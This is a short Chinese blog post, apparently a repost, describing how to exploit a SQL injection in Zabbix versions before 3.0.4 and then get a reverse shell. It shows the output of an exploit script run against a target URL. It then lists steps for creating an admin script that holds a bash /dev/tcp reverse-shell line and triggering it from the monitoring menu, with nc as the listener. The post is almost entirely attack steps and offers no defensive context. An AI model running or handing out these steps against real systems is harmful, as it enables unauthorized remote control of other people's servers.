Zabbix sql注入漏洞脚本执行反弹shell

标签：pytho   分享图片   one   zabbix   ubunt   http   exploit   登录   监测   

exp检测是否存在SQL注入漏洞
root@ubuntu:~# python zabbix.py http://ip:9090/
+------------------------------------------------------------+
Python Zabbix<3.0.4 SQL注入 Exploit
success
+------------------------------------------------------------+
Zabbix 存在SQL注入漏洞!

管理员 用户名密码：None

管理员 Session_id：None
然后进行登录：管理——脚本——创建脚本写入反弹shell、
bash -i >& /dev/tcp/xxx/1234 0>&1

监测——触发器——主机

执行我们编写的反弹shell脚本

Nc监听端口

Zabbix sql注入漏洞脚本执行反弹shell

标签：pytho   分享图片   one   zabbix   ubunt   http   exploit   登录   监测   

原文地址：https://www.cnblogs.com/someone9/p/9057591.html